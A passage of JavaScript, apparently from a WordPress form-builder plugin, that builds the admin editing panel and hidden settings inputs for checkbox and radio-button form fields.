		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
		
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_required");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");
	var el_disable_value_label = document.createElement('label');
		el_disable_value_label.setAttribute("class", "fm-field-label");
		el_disable_value_label.setAttribute("for", "el_disable_value");
		el_disable_value_label.innerHTML = "Enable option's value";
	
	var el_disable_value = document.createElement('input');
		el_disable_value.setAttribute("id", "el_disable_value");
		el_disable_value.setAttribute("type", "checkbox");   
		el_disable_value.setAttribute("onclick", "refresh_sel_options('"+i+"', 'checkbox')");
		if(w_value_disabled =="yes")
			el_disable_value.setAttribute("checked", "checked");		
		
	var el_randomize_label = document.createElement('label');
		el_randomize_label.setAttribute("class", "fm-field-label");
		el_randomize_label.innerHTML = "Randomize in frontend";
	
	var el_randomize = document.createElement('input');
		el_randomize.setAttribute("id", "el_randomize");
		el_randomize.setAttribute("type", "checkbox");
		el_randomize.setAttribute("value", "yes");
		el_randomize.setAttribute("onclick", "set_randomize('"+i+"_randomizeform_id_temp')");
		if(w_randomize=="yes")
			el_randomize.setAttribute("checked", "checked");

	var el_allow_other_label = document.createElement('label');
		el_allow_other_label.setAttribute("class", "fm-field-label");
		el_allow_other_label.innerHTML = "Allow other";
	
	var el_allow_other = document.createElement('input');
		el_allow_other.setAttribute("id", "el_allow_other");
		el_allow_other.setAttribute("type", "checkbox");
		el_allow_other.setAttribute("value", "yes");
		el_allow_other.setAttribute("onclick", "set_allow_other('"+i+"','checkbox')");
		if(w_allow_other=="yes")
			el_allow_other.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
		var el_attr_td_value = document.createElement('td');
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

	var el_choices_label = document.createElement('label');
		el_choices_label.setAttribute("class", "fm-field-label");
		el_choices_label.innerHTML = "Options ";
	var el_choices_add = document.createElement('img');
		el_choices_add.setAttribute("id", "el_choices_add");
		el_choices_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_choices_add.style.cssText = 'cursor:pointer;';
		el_choices_add.setAttribute("title", 'add');
		el_choices_add.setAttribute("onClick", "add_choise('checkbox',"+i+")");
	var	el_choices_add_text = document.createElement("span");
		el_choices_add_text.style.cssText ="font-size: 12px; padding-left:7px; font-weight:bold; cursor:pointer;";
		el_choices_add_text.innerHTML ="Add option(s)";				
		el_choices_add_text.setAttribute("onClick", "add_choise('checkbox',"+i+")");
	
	var el_choices_select = document.createElement('a');
	    el_choices_select.style.cssText ="color:#000; font-weight:bold; font-size: 13px; cursor:pointer; padding-top:10px; display:block;";
		el_choices_select.innerHTML = "Select options from database";
		el_choices_select.setAttribute("rel", "{handler: 'iframe', size: {x: 530, y: 370}}"	);
		el_choices_select.setAttribute("onclick","tb_show('', 'admin-ajax.php?action=select_data_from_db&field_id="+i+"&field_type=checkbox&value_disabled="+w_value_disabled+"&width=530&height=370&TB_iframe=1')");
		el_choices_select.setAttribute("class","modal");
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);

	edit_main_td3.appendChild(el_label_flow);
	edit_main_td3_1.appendChild(el_flow_vertical);
	edit_main_td3_1.appendChild(el_label_vertical);
	edit_main_td3_1.appendChild(br1);
	edit_main_td3_1.appendChild(el_flow_horizontal);
	edit_main_td3_1.appendChild(el_label_horizontal);
	
	
	edit_main_td13.appendChild(el_disable_value_label);
	edit_main_td13_1.appendChild(el_disable_value);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_randomize_label);
	edit_main_td8_1.appendChild(el_randomize);
	
	edit_main_td12.appendChild(el_option_position_label);
	edit_main_td12_1.appendChild(el_option_position1);
	edit_main_td12_1.appendChild(el_option_left);
	edit_main_td12_1.appendChild(br2);
	edit_main_td12_1.appendChild(el_option_position2);
	edit_main_td12_1.appendChild(el_option_right);
	
	edit_main_td9.appendChild(el_allow_other_label);
	edit_main_td9_1.appendChild(el_allow_other);
	
	edit_main_td11.appendChild(el_rowcol_label);
	edit_main_td11_1.appendChild(el_rowcol_textarea);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_td4.appendChild(el_choices_label);
	edit_main_td4_1.appendChild(br7);
	edit_main_td4_1.appendChild(el_choices_add);
	edit_main_td4_1.appendChild(el_choices_add_text);
	edit_main_td4_1.appendChild(el_choices_select);
	
	var div_ = document.createElement('div');
		div_.style.cssText = 'border-bottom:1px dotted black; width: 275px;';
	var br = document.createElement('br');
		
	var el_choices_mini_label = document.createElement('b');
		el_choices_mini_label.innerHTML="Name";
		el_choices_mini_label.style.cssText='padding-right: 40px; padding-left: 40px; font-size:9px; font-weight:bold;';

	var el_choices_value_mini_label = document.createElement('b');
		el_choices_value_mini_label.innerHTML="Value";
		el_choices_value_mini_label.style.cssText='padding-right: 38px; padding-left: 38px; font-size:9px; font-weight:bold;';
		
	var el_choices_dis_mini_label = document.createElement('b');
		el_choices_dis_mini_label.innerHTML="Delete";
		el_choices_dis_mini_label.style.cssText='padding-left: 3px; padding-right: 3px; font-size:9px; font-weight:bold;';
	
	var el_choices_move_mini_label = document.createElement('b');
		el_choices_move_mini_label.innerHTML="Move";
		el_choices_move_mini_label.style.cssText='padding-left: 3px; padding-right: 3px; font-size:9px; font-weight:bold;';		
	
	div_.appendChild(br);
	div_.appendChild(el_choices_mini_label);
	div_.appendChild(el_choices_value_mini_label);
	div_.appendChild(el_choices_dis_mini_label);
	div_.appendChild(el_choices_move_mini_label);
	edit_main_td4.appendChild(div_);

	
	aaa = false;
	n=w_choices.length;
	for(j=0; j<n; j++) {	
		var div = document.createElement('div');
			div.setAttribute("id", j);
			div.setAttribute("class", "change_pos");
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+j);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("class", "fm-field-choice");
			if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices.setAttribute("other", '1');
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.setAttribute("checked", w_choices_checked[j]);
			el_choices.setAttribute("onKeyUp", "change_label_name("+j+", '"+i+"_label_element"+j+"', this.value, 'checkbox'); change_label_value('"+i+"_elementform_id_temp"+j+"', jQuery('#el_option_value"+j+"').val());");
			el_choices.setAttribute("onpaste", "elem = this; change_label_name_on_paste('"+j+"', '"+i+"_label_element"+j+"', 'checkbox'); change_label_value_on_paste('"+i+"_elementform_id_temp"+j+"', this)");	
			if(w_choices_params[j])
				el_choices.setAttribute("disabled", 'disabled');	
	
		var el_choices_value = document.createElement('input');
			el_choices_value.setAttribute("id", "el_option_value"+j);		
			if(!w_choices_params[j] && (w_allow_other!="yes" || j!=w_allow_other_num))
				el_choices_value.setAttribute("class", "el_option_value fm-field-choice");
			else
				el_choices_value.setAttribute("class", "fm-field-choice");
			el_choices_value.setAttribute("type", "text");
			el_choices_value.setAttribute("value", w_choices_value[j]);
			el_choices_value.setAttribute("onKeyUp", "change_label_value('"+i+"_elementform_id_temp"+j+"', this.value)");
			el_choices_value.setAttribute("onpaste", "change_label_value_on_paste('"+i+"_elementform_id_temp"+j+"', this)");
			if(w_value_disabled=='no' || w_choices_params[j] || (w_allow_other=="yes" && j==w_allow_other_num))
				el_choices_value.setAttribute("disabled", 'disabled');
	
		var el_choices_params = document.createElement('input');
			el_choices_params.setAttribute("id", "el_option_params"+j);
			el_choices_params.setAttribute("class", "el_option_params");
			el_choices_params.setAttribute("type", "hidden");
			el_choices_params.setAttribute("value", w_choices_params[j]);

		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px; display:none';
		else			
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px;';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise("+j+","+i+",'checkbox')");
			
		var el_choices_handle = document.createElement('img');
			el_choices_handle.setAttribute("class", "el_choices_sortable");
			el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');	
			if(w_allow_other=="yes" && j==w_allow_other_num)			
				el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px 0px 2px 34px;';
			else	
				el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle;  margin:2px;';
			el_choices_handle.setAttribute("align", 'top');
	
		
		div.appendChild(el_choices);
		div.appendChild(el_choices_value);	
		div.appendChild(el_choices_remove);
		div.appendChild(el_choices_handle);
		div.appendChild(el_choices_params);
		edit_main_td4.appendChild(div);
		if(w_choices_checked[j]==true)
			if(w_allow_other=="yes" && j==w_allow_other_num)
				aaa = true;
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr13.appendChild(edit_main_td13);
	edit_main_tr13.appendChild(edit_main_td13_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr12.appendChild(edit_main_td12);
	edit_main_tr12.appendChild(edit_main_td12_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr12);
	edit_main_table.appendChild(edit_main_tr13);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
	element='input';
	type = 'checkbox'; 
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_checkbox");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
 	var adding_randomize = document.createElement("input");
		adding_randomize.setAttribute("type", "hidden");
		adding_randomize.setAttribute("value", w_randomize);
		adding_randomize.setAttribute("name", i+"_randomizeform_id_temp");			
		adding_randomize.setAttribute("id", i+"_randomizeform_id_temp");
	    
	var adding_allow_other = document.createElement("input");
		adding_allow_other.setAttribute("type", "hidden");
		adding_allow_other.setAttribute("value", w_allow_other);
		adding_allow_other.setAttribute("name", i+"_allow_otherform_id_temp");			
		adding_allow_other.setAttribute("id", i+"_allow_otherform_id_temp");
	    
	var adding_allow_other_id = document.createElement("input");
		adding_allow_other_id.setAttribute("type", "hidden");
		adding_allow_other_id.setAttribute("value", w_allow_other_num);
		adding_allow_other_id.setAttribute("name", i+"_allow_other_numform_id_temp");			
		adding_allow_other_id.setAttribute("id", i+"_allow_other_numform_id_temp");
			
	var adding_rowcol= document.createElement("input");
		adding_rowcol.setAttribute("type", "hidden");
		adding_rowcol.setAttribute("value", w_rowcol);
		adding_rowcol.setAttribute("name", i+"_rowcol_numform_id_temp");			
		adding_rowcol.setAttribute("id", i+"_rowcol_numform_id_temp");		
	var adding_option_left_right= document.createElement("input");
		adding_option_left_right.setAttribute("type", "hidden");
		adding_option_left_right.setAttribute("value", w_field_option_pos);	
		adding_option_left_right.setAttribute("id", i+"_option_left_right");		 

	var adding_value_disabled = document.createElement("input");
		adding_value_disabled.setAttribute("type", "hidden");
		adding_value_disabled.setAttribute("value", w_value_disabled);
		adding_value_disabled.setAttribute("name", i+"_value_disabledform_id_temp");	
		adding_value_disabled.setAttribute("id", i+"_value_disabledform_id_temp"); 	    
	var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
		
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");

	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	
	var table_little_t = document.createElement('div');
		table_little_t.style.display="table";
			
	var table_little = document.createElement('div');
		table_little.setAttribute("id", i+"_table_little");
		table_little.style.display="table-row-group";
		table_little_t.appendChild(table_little);
   
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";

	
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		required.style.verticalAlign="top";
		if(w_required=="yes")
			required.innerHTML = " *";

	var main_td  = document.getElementById('show_table');
  
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);

	div_element.appendChild(adding_required);
	div_element.appendChild(adding_randomize);
	div_element.appendChild(adding_allow_other);
	div_element.appendChild(adding_allow_other_id);
	div_element.appendChild(adding_rowcol);
	div_element.appendChild(adding_option_left_right);
	div_element.appendChild(adding_value_disabled);
	div_element.appendChild(table_little_t);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
  
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);

	if(w_field_label_pos=="top")
		label_top(i);
				
	change_class(w_class, i);
	refresh_attr(i, 'type_checkbox');

	refresh_rowcol(i, 'checkbox');
	add_id_and_name(i, 'type_checkbox');
	if(aaa)
		show_other_input(i);
	
	jQuery(function() {
		jQuery( "#choices" ).sortable({ 
			items: ".change_pos" ,
			handle: ".el_choices_sortable",
			update: function(event, ui) {		
				refresh_rowcol(i, 'checkbox');
				refresh_id_name(i, 'type_checkbox');
			}
		});	
	});
}

function type_radio(i, w_field_label, w_field_label_size, w_field_label_pos, w_field_option_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value,w_value_disabled, w_choices_value, w_choices_params ){

	document.getElementById("element_type").value="type_radio";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");

	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
	var edit_main_tr11  = document.createElement('tr');
    var edit_main_tr12  = document.createElement('tr');
    var edit_main_tr13  = document.createElement('tr'); 				

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.setAttribute("id", "choices");
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding:20px 0 0 25px; vertical-align:top;";
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	var edit_main_td11 = document.createElement('td');
	var edit_main_td11_1 = document.createElement('td');
	var edit_main_td12 = document.createElement('td');
	var edit_main_td12_1 = document.createElement('td');
	var edit_main_td13 = document.createElement('td');
	var edit_main_td13_1 = document.createElement('td');		
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.setAttribute("class", "fm-field-label");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
		
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");
		el_label_position1.setAttribute("checked", "checked");
		
	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
        el_label_left.innerHTML = "Left";
		
	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");
		
	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
        el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos == "top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");
				
	var el_option_position_label = document.createElement('label');
		el_option_position_label.setAttribute("class", "fm-field-label");
		el_option_position_label.innerHTML = "Field option label position";
	
	var el_option_position1 = document.createElement('input');
		el_option_position1.setAttribute("id", "edit_for_option_position_right");
		el_option_position1.setAttribute("type", "radio");        
		el_option_position1.setAttribute("name", "edit_for_option_position");
		el_option_position1.setAttribute("onchange", "option_left("+i+",'radio')");
		
	var el_option_left = document.createElement('label');
		el_option_left.setAttribute("for", "edit_for_option_position_right");
        el_option_left.innerHTML = "Left";	
		
	var el_option_position2 = document.createElement('input');
		el_option_position2.setAttribute("id", "edit_for_option_position_left");
		el_option_position2.setAttribute("type", "radio");
    	el_option_position2.setAttribute("name", "edit_for_option_position");
		el_option_position2.setAttribute("onchange", "option_right("+i+",'radio')");
		
	var el_option_right = document.createElement('label');
		el_option_right.setAttribute("for", "edit_for_option_position_left");
        el_option_right.innerHTML = "Right";
		
	if(w_field_option_pos == "right")
		el_option_position2.setAttribute("checked", "checked");
	else
		el_option_position1.setAttribute("checked", "checked");
	var el_label_flow = document.createElement('label');
		el_label_flow.setAttribute("class", "fm-field-label");
		el_label_flow.innerHTML = "Relative Position";

	var el_flow_vertical = document.createElement('input');
		el_flow_vertical.setAttribute("id", "edit_for_flow_vertical");
		el_flow_vertical.setAttribute("type", "radio");
		el_flow_vertical.setAttribute("value", "ver");
		el_flow_vertical.setAttribute("name", "edit_for_flow");
		el_flow_vertical.setAttribute("onchange", "refresh_rowcol("+i+",'radio')");
	
	var el_label_vertical = document.createElement('label');
		el_label_vertical.setAttribute("for", "edit_for_flow_vertical");
        el_label_vertical.innerHTML = "Vertical";	
		
	var el_flow_horizontal = document.createElement('input');
            el_flow_horizontal.setAttribute("id", "edit_for_flow_horizontal");
            el_flow_horizontal.setAttribute("type", "radio");
            el_flow_horizontal.setAttribute("value", "hor");
            el_flow_horizontal.setAttribute("name", "edit_for_flow");
            el_flow_horizontal.setAttribute("onchange", "refresh_rowcol("+i+",'radio')");
			
	var el_label_horizontal = document.createElement('label');
		el_label_horizontal.setAttribute("for", "edit_for_flow_horizontal");
        el_label_horizontal.innerHTML = "Horizontal";		
	
	if(w_flow == "hor")
		el_flow_horizontal.setAttribute("checked", "checked");
	else
		el_flow_vertical.setAttribute("checked", "checked");
	var el_rowcol_label = document.createElement('label');
		el_rowcol_label.setAttribute("class", "fm-field-label");
		el_rowcol_label.setAttribute("for", "edit_for_rowcol");
		el_rowcol_label.innerHTML = "Rows/Columns";
	
	var el_rowcol_textarea = document.createElement('input');
        el_rowcol_textarea.setAttribute("id", "edit_for_rowcol");
		el_rowcol_textarea.setAttribute("type", "text");
 		el_rowcol_textarea.setAttribute("value", w_rowcol);
		el_rowcol_textarea.setAttribute("onChange", "refresh_rowcol('"+i+"','radio')");	

	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	    el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_required");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");

	var el_disable_value_label = document.createElement('label');
		el_disable_value_label.setAttribute("for", "el_disable_value");
		el_disable_value_label.setAttribute("class", "fm-field-label");
		el_disable_value_label.innerHTML = "Enable option's value";
	
	var el_disable_value = document.createElement('input');
		el_disable_value.setAttribute("id", "el_disable_value");
		el_disable_value.setAttribute("type", "checkbox");   
		el_disable_value.setAttribute("onclick", "refresh_sel_options('"+i+"', 'radio')");
		if(w_value_disabled =="yes")
			el_disable_value.setAttribute("checked", "checked");
		
	var el_randomize_label = document.createElement('label');
		el_randomize_label.setAttribute("class", "fm-field-label");
		el_randomize_label.setAttribute("for", "el_randomize");
		el_randomize_label.innerHTML = "Randomize in frontend";
	
	var el_randomize = document.createElement('input');
		el_randomize.setAttribute("id", "el_randomize");
		el_randomize.setAttribute("type", "checkbox");
		el_randomize.setAttribute("value", "yes");
		el_randomize.setAttribute("onclick", "set_randomize('"+i+"_randomizeform_id_temp')");
		if(w_randomize=="yes")
			el_randomize.setAttribute("checked", "checked");

	var el_allow_other_label = document.createElement('label');
		el_allow_other_label.setAttribute("class", "fm-field-label");
		el_allow_other_label.setAttribute("for", "el_allow_other");
		el_allow_other_label.innerHTML = "Allow other";
	
	var el_allow_other = document.createElement('input');
		el_allow_other.setAttribute("id", "el_allow_other");
		el_allow_other.setAttribute("type", "checkbox");
		el_allow_other.setAttribute("value", "yes");
		el_allow_other.setAttribute("onclick", "set_allow_other('"+i+"','radio')");
		if(w_allow_other=="yes")
			el_allow_other.setAttribute("checked", "checked");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
